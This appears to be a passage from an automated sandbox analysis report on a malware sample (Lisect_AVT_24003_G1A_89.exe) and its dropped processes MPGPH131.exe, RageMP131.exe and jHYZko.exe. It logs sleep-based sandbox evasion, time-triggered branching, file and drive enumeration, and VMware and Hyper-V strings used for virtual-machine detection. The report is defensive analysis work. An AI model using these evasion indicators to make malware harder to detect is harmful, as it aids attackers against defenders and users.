Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4432 Thread sleep count: 92 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1372 Thread sleep count: 4041 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1372 Thread sleep time: -4041000s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4432 Thread sleep count: 233 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3812 Thread sleep count: 235 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 616 Thread sleep count: 4028 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 616 Thread sleep time: -4028000s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3624 Thread sleep count: 90 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2556 Thread sleep count: 4134 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2556 Thread sleep time: -4134000s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3624 Thread sleep count: 234 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3660 Thread sleep count: 235 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2452 Thread sleep count: 344 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6096 Thread sleep count: 5226 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6096 Thread sleep time: -5226000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2604 Thread sleep count: 2510 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2604 Thread sleep time: -2510000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2452 Thread sleep count: 273 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5612 Thread sleep count: 267 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E61718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E61754h 1_2_00E61718
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0108B3B5 recv,FindFirstFileExW,GetLastError, 0_2_0108B3B5
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01898D7B FindFirstFileA, 0_2_01898D7B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0108B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_0108B41B
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E629E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00E629E2
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0064B3B5 recv,FindFirstFileExW,GetLastError, 7_2_0064B3B5
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 7_2_0064B41B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0064B3B5 recv,FindFirstFileExW,GetLastError, 8_2_0064B3B5
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 8_2_0064B41B
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E62B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00E62B8C
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}2c
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}l\
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.1.dr Binary or memory string: vmci.sys
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: vmware
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual USB Mouse
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.1.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MPGPH131.exe, 00000008.00000002.4459782824.0000000001691000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000t
Source: Amcache.hve.1.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr Binary or memory string: \driver\vmci,\driver\pci
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ~VirtualMachineTypes
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000a
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!!fW
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022624316.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh-(
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
